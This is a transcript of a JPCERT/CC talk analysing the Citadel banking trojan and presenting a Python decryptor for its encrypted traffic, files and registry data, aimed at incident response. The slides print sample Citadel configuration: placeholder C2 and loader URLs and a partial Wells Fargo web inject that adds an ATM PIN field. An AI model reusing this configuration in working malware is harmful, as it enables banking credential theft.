Fight Against Citadel in Japan by You Nakatsuru
Post on 19-Oct-2014
DESCRIPTION
Lately in Japan the malware Citadel has been implicated in multiple internet banking unauthorised transaction incidents. Citadel is a banking trojan, much like ZeuS. When the malware successfully infects the user's environment it uses special functions called Web Injects to alter the website displayed on the end user's computer and steal login credentials for internet banking sites. To handle Citadel infection incidents it is necessary to clarify what settings the Citadel malware uses and what servers it communicates with; it is therefore essential to have in-depth knowledge of Citadel and to examine the files left by Citadel. In this presentation I will present my findings from a detailed analysis of Citadel and introduce the data transmission reconstruction and file reconstruction tools created to handle Citadel incidents.

You Nakatsuru

You 'Tsuru' Nakatsuru, CISSP, is a "just married" Information Security Analyst at the Analysis Center of JPCERT/CC (Japan Computer Emergency Response Team Coordination Center) since April 2013. His primary responsibilities are to analyze malware abused in highly sophisticated cyber attacks, along with R&D on advanced counter-malware technologies and cutting-edge incident handling methods. He also takes an active role in capacity building for junior malware analysts.

TRANSCRIPT
Fight Against Citadel in Japan
2014/02/18 JPCERT/CC Analysis Center NAKATSURU You
Copyright©2014 JPCERT/CC All rights reserved.1
Agenda
• Background: Unauthorized Remittance in Japan
• Analyzing Citadel: Overview, Encryption
• Making of Citadel Decryptor
• Citadel Decryptor: Usage, Demo
BACKGROUND
Illegal Transfer in Japan
Chart: amounts of illegal transfers by year, 2011, 2012 and 2013; values shown: $500k, $3 million and $14 million (source: http://www.npa.go.jp/cyber/pdf/H260131_banking.pdf)
Targeting 32 Banks
Related with Malware
http://www.npa.go.jp/cyber/pdf/H260131_banking.pdf
In most cases, passwords are retrieved and abused through defaced web pages where malware requests users to authenticate.
Banking Trojan
ZeuS, Ice IX, Citadel, GameOver, SpyEye, Carberp, etc.
Why Citadel?
http://blog.trendmicro.com/trendlabs-security-intelligence/citadel-makes-a-comeback-targets-japan-users/
Banking Trojan Incident
Diagram: Attacker, Back Connect Server, Web Panel, User, Internet Banking
Web Injects
Diagram: User, Internet Banking
Web Injects Demo
Builder & Web Panel
Underground Market
Our Incident Response
Diagram: Attacker, Back Connect Server, Web Panel, User, Internet Banking; Information Sharing
Information We Need
Diagram: Attacker, Back Connect Server, Web Panel, User, Internet Banking
Questions: Which site is targeted; Where (each server); How
ANALYZING CITADEL
External Information
• Leaked Citadel: Web panel, Builder
• Leaked ZeuS: Web panel, Builder
• ZeuS source: Web panel source, Builder source
• Binary: Debug info
• Blogs: Sophos, LEXSI
Analysis Method
• Surface Analysis: Retrieving information
• Runtime Analysis: Monitoring tools, Sandbox and debugging
• Static Analysis: Reading source code, assembly code
Static Analysis: Diffing with ZeuS
Citadel Overview
Diagram: Sending report; Current settings, etc.; Web Injects
Configuration Files
• Base Config: Default settings; Encryption key, URL of Dynamic Config; Encoded and hardcoded
• Dynamic Config: Additional settings; HTTP Injection, etc.; Downloaded from servers
Base Config

```
botnet "CIT"
timer_config 4 9
timer_logs 3 6
timer_stats 4 8
timer_modules 1 4
timer_autoupdate 8
url_config1 "http://citadelhost/folder/file.php|file=config.dll"
url_config2 "http://reserve-citadelhost/folder/file.php|file=config.dll"
remove_certs 1
disable_cookies 0
encryption_key "key123"
report_software 1
enable_luhn10_get 0
enable_luhn10_post 1
disable_antivirus 0
use_module_video 1
antiemulation_enable 0
disable_httpgrabber 0
use_module_ffcookie 1
```

url_config1 / url_config2: Dynamic Config URL
encryption_key: Password to generate RC4 key
Dynamic Config

```
url_loader "http://citadelhost/folder/file.php|file=soft.exe"
url_server "http://citadelhost/folder/gate.php"
file_webinjects "injects.txt"
url_webinjects "http://citadelhost/folder/file.php"
entry "AdvancedConfigs"
"http://reserve-host1/folder/file.php|file=config.bin"
"http://reserve-host2/folder/file.php|file=config.bin"
end
entry "WebFilters"
"#*wellsfargo.com/*"
"@*payment.com/*"
"!http://*.com/*.jpg"
end
(snip)
set_url https://www.wellsfargo.com/ GP
data_before
<div><strong><label for="userid">Username</la
data_end
data_inject
<input type="text" accesskey="U" id="userid" na
<DIV><STRONG><LABEL for=userid>ATM Pin</L
style="WIDTH: 147px" tabIndex="2" maxLength=
<DIV><STRONG><label for="password">Passwo
<input type="password" accesskey="P" id="pass
<input type="hidden" name="screenid" value="SI
<input type="submit" value="Go" name="btnSign
<input type="hidden" id="u_p" name="u_p" value
</form>
data_end
```

(The HTML lines of the inject are cut off at the right edge of the slide.)
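The "Information We Need" for incident response (gate and loader servers, backup config URLs, filtered and targeted sites) can be pulled straight out of a decrypted Dynamic Config in this text format. The parser below is an added example, not part of the Citadel Decryptor; its sample config is constructed from the slide's placeholder hostnames and the `data_*`/`entry`/`end` block structure shown above.

```python
import re

# Constructed sample in the Dynamic Config text format shown on the slide
# (hostnames are the slide's placeholders, not real indicators).
SAMPLE_CONFIG = """
url_loader "http://citadelhost/folder/file.php|file=soft.exe"
url_server "http://citadelhost/folder/gate.php"
file_webinjects "injects.txt"
url_webinjects "http://citadelhost/folder/file.php"
entry "AdvancedConfigs"
"http://reserve-host1/folder/file.php|file=config.bin"
"http://reserve-host2/folder/file.php|file=config.bin"
end
entry "WebFilters"
"#*wellsfargo.com/*"
"@*payment.com/*"
"!http://*.com/*.jpg"
end
set_url https://www.wellsfargo.com/ GP
data_before
<div><strong><label for="userid">Username</label>
data_end
"""

def parse_dynamic_config(text):
    """Pull out the fields an incident responder needs: C2/gate and loader
    URLs, backup config URLs (AdvancedConfigs), WebFilters and inject targets."""
    info = {"urls": {}, "entries": {}, "inject_targets": []}
    section = None      # name of the current entry "..." ... end block
    in_data = False     # inside a data_before/data_inject/data_after ... data_end block
    for line in (raw.strip() for raw in text.splitlines()):
        if in_data:                       # raw HTML: never interpret it as config
            in_data = line != "data_end"
        elif line in ("data_before", "data_inject", "data_after"):
            in_data = True
        elif section is not None:
            if line == "end":
                section = None
            elif line.startswith('"'):
                info["entries"][section].append(line.strip('"'))
        elif m := re.match(r'entry\s+"([^"]+)"', line):
            section = m.group(1)
            info["entries"][section] = []
        elif m := re.match(r'((?:url|file)_\w+)\s+"([^"]*)"', line):
            info["urls"][m.group(1)] = m.group(2)
        elif m := re.match(r'set_url\s+(\S+)\s+(\S+)', line):
            info["inject_targets"].append((m.group(1), m.group(2)))
    return info

def config_hosts(info):
    """Distinct hosts from every URL in the config, for blocking and log searches."""
    urls = list(info["urls"].values()) + info["entries"].get("AdvancedConfigs", [])
    hosts = set()
    for u in urls:
        m = re.match(r'https?://([^/|]+)', u)
        if m:
            hosts.add(m.group(1))
    return sorted(hosts)
```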
Encryption
Encrypted Data
• Packet: POST data (report file), Dynamic Config, Additional modules
• File: Report, Backup of additional modules
• Registry: Current settings, Backup of Dynamic Config
Encryption Method
• AES+: AES encryption and XOR encoding
• RC4+: RC4 encryption and XOR encoding
• RC4+ * 2: RC4+ encryption applied twice
• Installed Data: AES+ encryption using a randomly generated key created at install time
In Case of Dynamic Config
Diagram: Base Config (key material) and Dynamic Config, with XOR, AES+ and UCL (decompression) stages
0x400 Bytes Overlay
• Before install: PE file + Install setting (XOR key) + Padding
• After install: PE file + Installed data (ID, Install paths, AES key, StrageArray key, etc.) + Padding
Encryption Summary

| Category | Data | Format | Encryption |
|---|---|---|---|
| Packet | Report | EncryptedBinStrage | RC4+ |
| Packet | Dynamic Config | EncryptedBinStrage | AES+ |
| Packet | Additional modules | Executable | RC4+ * 2 |
| File | Report file | StrageArray | Installed Data |
| File | Backup of modules | StrageArray | Installed Data |
| Registry | Backup of Dynamic Config | EncryptedBinStrage | Installed Data |
MAKING OF CITADEL DECRYPTOR
Our Goal: Decrypt data & retrieve information for incident response
Implementation
Python, PyCrypto, pefile, UCL
RC4+ Decryption
Steps: Get RC4 keystream, RC4, VisualDecrypt
RC4+ Implementation

```python
def rc4_plus_decrypt(login_key, base_key, buf):
    # base_key['state'] is the 256-byte RC4 state built from the Base Config key;
    # it is copied so that each call starts from the same keystream position.
    # login_key (LOGINKEY) is the repeating XOR key applied after RC4.
    S1 = list(base_key['state'])
    S2 = bytes(login_key)
    out = bytearray()
    i = j = k = 0
    for c in buf:
        # standard RC4 PRGA step
        i = (i + 1) & 0xFF
        j = (j + S1[i]) & 0xFF
        S1[i], S1[j] = S1[j], S1[i]
        # XOR with the keystream byte, then Citadel's extra XOR with LOGINKEY
        out.append(c ^ S1[(S1[i] + S1[j]) & 0xFF] ^ S2[k % len(S2)])
        k += 1
    return bytes(out)
```
AES+ Decryption
Steps: Get AES key, AESDecrypt, VisualDecrypt
AES+ Implementation

```python
from Crypto.Cipher import AES

def unpack_aes_plus(login_key, base_key, xor_key, aes_key, data):
    # AES in ECB mode, which is what PyCrypto's AES.new(key) defaulted to;
    # login_key and base_key are kept in the signature but not used here
    aes = AES.new(aes_key, AES.MODE_ECB)
    tmp = aes.decrypt(data)
    # remove the XOR layer applied with the repeating XOR key
    out = bytearray()
    for i in range(len(tmp)):
        out.append(tmp[i] ^ xor_key[i % len(xor_key)])
    return bytes(out)
```
Decryption Parameter
• Base Config: RC4 key
• Installed Data: StrageArray key, Random AES key
• Others: Salt, LoginKey, RC4 XOR key
Obtaining Parameter

```python
import re

# Bytes pattern over the unpacked Citadel code (the slide's "¥" characters are
# backslashes rendered in a Japanese font). It matches the x86 sequence
#   56               push esi
#   BA xx xx 00 00   mov edx, imm32   (group 1: the low 16 bits of the immediate)
#   52               push edx
#   68 xx xx xx xx   push imm32       (group 2: a 32-bit immediate, i.e. an address)
#   50               push eax
#   E8 xx xx xx xx   call rel32
#   8B 0D            mov ecx, [imm32]
re.compile(rb".*\x56\xBA(..)\x00\x00\x52\x68(....)\x50\xE8....\x8B\x0D.*", re.DOTALL)
```
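How the match is turned into a parameter read, as an added example (not the Citadel Decryptor's own code): the two captured immediates are assumed to be the parameter's size and its virtual address, the image base is an assumed value, and `fake_get_data` stands in for pefile's `pe.get_data(rva, length)` on a real unpacked sample.

```python
import re
import struct

# The slide's pattern as a bytes regex (its "¥" characters are backslashes).
PARAM_PATTERN = re.compile(
    rb".*\x56\xBA(..)\x00\x00\x52\x68(....)\x50\xE8....\x8B\x0D.*", re.DOTALL)

def find_parameter(code, image_base):
    """Return (size, va, rva) for the matched sequence, or None.
    The leading greedy .* means the regex settles on the last occurrence."""
    m = PARAM_PATTERN.match(code)
    if m is None:
        return None
    size = struct.unpack("<H", m.group(1))[0]   # mov edx, imm32 (assumed: size)
    va = struct.unpack("<I", m.group(2))[0]     # push imm32 (assumed: address)
    return size, va, va - image_base

def read_parameter(code, image_base, get_data):
    """get_data(rva, size) stands in for pefile's pe.get_data(rva, length)."""
    hit = find_parameter(code, image_base)
    if hit is None:
        return None
    size, _va, rva = hit
    return get_data(rva, size)

# Constructed test input (not bytes from a real sample): filler, the sequence
# referencing 0x20 bytes at VA 0x00403000, filler. Image base is assumed.
IMAGE_BASE = 0x00400000
SAMPLE_CODE = (b"\x90\x90\x56\xBA" + struct.pack("<I", 0x20)
               + b"\x52\x68" + struct.pack("<I", 0x00403000)
               + b"\x50\xE8\x00\x00\x00\x00\x8B\x0D\x00\x20\x40\x00\xC3")

# A fake section: 0x20 bytes of 'A' at RVA 0x3000, in place of a parsed PE.
FAKE_SECTION = {0x3000: b"A" * 0x20}

def fake_get_data(rva, size):
    return FAKE_SECTION[rva][:size]
```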
UCL Decompress
http://www.oberhumer.com/opensource/ucl/
UCL Decompress using ctypes

```python
from ctypes import cdll, c_buffer, c_int, pointer

def _ucl_decompress(self, data):
    # UCL: path to the UCL shared library; DECOMPRESS_MAX_SIZE: output buffer size
    ucl = cdll.LoadLibrary(UCL)
    compressed = c_buffer(data)
    decompressed = c_buffer(DECOMPRESS_MAX_SIZE)
    decompressed_size = c_int()
    # int ucl_nrv2b_decompress_le32(src, src_len, dst, dst_len, wrkmem);
    # wrkmem is declared but not used by UCL, so NULL is passed
    result = ucl.ucl_nrv2b_decompress_le32(
        pointer(compressed), c_int(len(data)),
        pointer(decompressed), pointer(decompressed_size), None)
    if result != 0:   # UCL_E_OK == 0
        raise ValueError("UCL decompression failed: %d" % result)
    return decompressed.raw[:decompressed_size.value]
```
CITADEL DECRYPTOR
Environment
• Windows + 32bit Python: Citadel Decryptor is only available for 32bit environments
• PyCrypto: For AES decryption; Windows binary: http://www.voidspace.org.uk/python/modules.shtml#pycrypto
• pefile: A Python module for parsing the PE file format (Windows executables); used for parsing PE sections to get decryption params
Data Requirement
• Encrypted data
• Unpacked Citadel: RC4 key, XOR key for AES+, XOR key for RC4+ (LOGINKEY), Salt for RC4+
• Installed Citadel: Installed Data (Random generated AES key, Random generated StrageArray key)
citadel_decryptor.py: Encrypted data & unpacked module are always required

```
>citadel_decryptor.py
usage: citadel_decryptor.py [-h] [-n] [-a] [-d] [-o OUT] [-D] [-l LOGIN]
                            [-k KEY] [-x XOR] [-s SALT] [-i INSTALLED]
                            [-m MODE] [-v]
                            DAT EXE
citadel_decryptor.py: error: too few arguments
>
```
Cheat Sheet
The following options have to be specified as well as the encrypted data and unpacked Citadel:

| Category | Data | Option |
|---|---|---|
| Packet | Report | -m2 |
| Packet | Dynamic Config | -d |
| Packet | Additional modules | -m3 -n |
| File | Report files | -a -i [Installed Citadel] |
| File | Backup of modules | -a -i [Installed Citadel] |
| Registry | Backup of Dynamic Config | -d -i [Installed Citadel] |
Demo
Tips
Convert registry data to binary
• Export data using regedit & convert them to binary using the following FileInsight plugin
• https://github.com/nmantani/FileInsight-plugins
Unpacking
• It is easy to break on APIs: WriteProcessMemory, CreateProcessW, VirtualFree / VirtualFreeEx / RtlFreeHeap
• Dump the executable (not after allocated) from virtual memory, including the 0x400 bytes overlay
Future Tasks
We already have
• ZeuS Decryptor (Ver 2.0.8.9, Ver 2.9.6.1)
• Ice IX Decryptor
• etc.
We want
• Gameover (P2P ZeuS) Decryptor